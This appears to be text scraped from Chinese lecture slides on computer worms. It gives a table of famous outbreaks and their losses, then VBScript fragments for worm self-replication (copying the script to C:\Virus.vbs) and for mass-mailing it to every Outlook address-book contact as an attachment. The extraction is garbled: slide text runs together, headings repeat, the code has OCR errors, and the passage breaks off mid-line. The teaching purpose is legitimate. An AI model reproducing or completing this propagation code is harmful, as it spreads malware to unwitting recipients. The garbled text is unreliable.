以通過網(wǎng)絡(luò)連接進(jìn)行自身復(fù)制的程序，與以往病毒方式不同，文件型病毒、宏病毒需要在計(jì)算機(jī)的硬盤、軟盤或文件系統(tǒng)中繁殖，而典型的蠕蟲只會(huì)在內(nèi)存中維持一個(gè)活動(dòng)副本，甚至根本不向硬盤寫入任何信息。自從1988年莫里斯從實(shí)驗(yàn)室研制出第一個(gè)蠕蟲以來，蠕蟲以其快速、多樣化的傳播方式不斷給網(wǎng)絡(luò)世界帶來災(zāi)害。特別是1999年以來，高危蠕蟲不斷出現(xiàn)，使世界蒙受了輕則幾十億，重則幾百億美元的巨大經(jīng)濟(jì)損失。3.3蠕蟲計(jì)算機(jī)蠕蟲是一種可以通過網(wǎng)絡(luò)連接進(jìn)行自身復(fù)制的近年來蠕蟲爆發(fā)情況統(tǒng)計(jì)表蠕蟲名稱爆發(fā)時(shí)間造成損失莫里斯蠕蟲1988年6000多臺(tái)電腦停機(jī)，經(jīng)濟(jì)損失達(dá)9600萬(wàn)美元梅麗莎1999年政府部門和一些大公司緊急關(guān)閉了網(wǎng)絡(luò)服務(wù)器，經(jīng)濟(jì)損失超過12億Iloveyou2000年5月眾多用戶電腦被感染，損失達(dá)96億美元紅色代碼2001年7月網(wǎng)絡(luò)癱瘓，直接經(jīng)濟(jì)損失超過26億求職信2001年12月大量郵件堵塞服務(wù)器，損失達(dá)數(shù)百億美元蠕蟲王2003年1月網(wǎng)絡(luò)大面積癱瘓，銀行自動(dòng)取款機(jī)運(yùn)行中斷，直接損失超過26億沖擊波2003年7月大量網(wǎng)絡(luò)癱瘓，造成數(shù)十億美元的損失MyDoom2004年1月大量的垃圾郵件阻塞SCO和微軟網(wǎng)站，給全球經(jīng)濟(jì)造成了300多億美元的損失近年來蠕蟲爆發(fā)情況統(tǒng)計(jì)表蠕蟲名稱爆發(fā)時(shí)間造成損失莫里自我復(fù)制過程創(chuàng)建一個(gè)文件操作對(duì)象SetobjFs=CreateObject("Scripting.FileSystemObject")通過文件操作對(duì)象的方法創(chuàng)建了一個(gè)TXT文件objFs.CreateTextFile("C:\virus.txt")如果把這兩句話保存成為vbs的腳本文件，點(diǎn)擊它，就會(huì)在C盤中創(chuàng)建一個(gè)TXT文件了。ObjFs.GetFile(WScript.ScriptFullName).Copy(“C:\Virus.vbs”)自我復(fù)制過程創(chuàng)建一個(gè)文件操作對(duì)象通過郵件傳播FunctionmailBroadcast()OnerrorresumenextWscript.echoSetoutlookApp=CreateObject(“Outlook.Application”)；創(chuàng)建一個(gè)Outlook應(yīng)用的對(duì)象IfoutlookApp=”O(jiān)utlook”ThenSetmapiObj=outlookApp.GetNameSpace(“MAPI”)；獲取MAPI的名字空間SetaddrList=mapiObj.AddressLists；獲取地址表的個(gè)數(shù)ForEachaddrlnaddrList1faddr.AddressEntries.Count<>0ThenaddrEntCount=addr.AddressEntries.Count；獲取每個(gè)地址表的Email記錄數(shù)ForaddrEntlndex=1TOaddrEntCount；遍歷地址表的Email地址

通過郵件傳播FunctionmailBroadcast(Setitem=outlookApp.CreateItem(0)；獲取一個(gè)郵件對(duì)象實(shí)例SetaddrEnt=addr.AddressEntries(addrEntlndex)；獲取具體Email地址Item.TO=addrEnt.Address；填入收信人地址Item.Suject=”病毒傳播實(shí)驗(yàn)”；寫入郵件標(biāo)題Item.Body=”這是病毒實(shí)驗(yàn)軟件測(cè)試，收到此信請(qǐng)不要慌張!”；寫入文件內(nèi)容SetattachMents=item.Attachments；定義郵件附件Attachments.AddfileSysO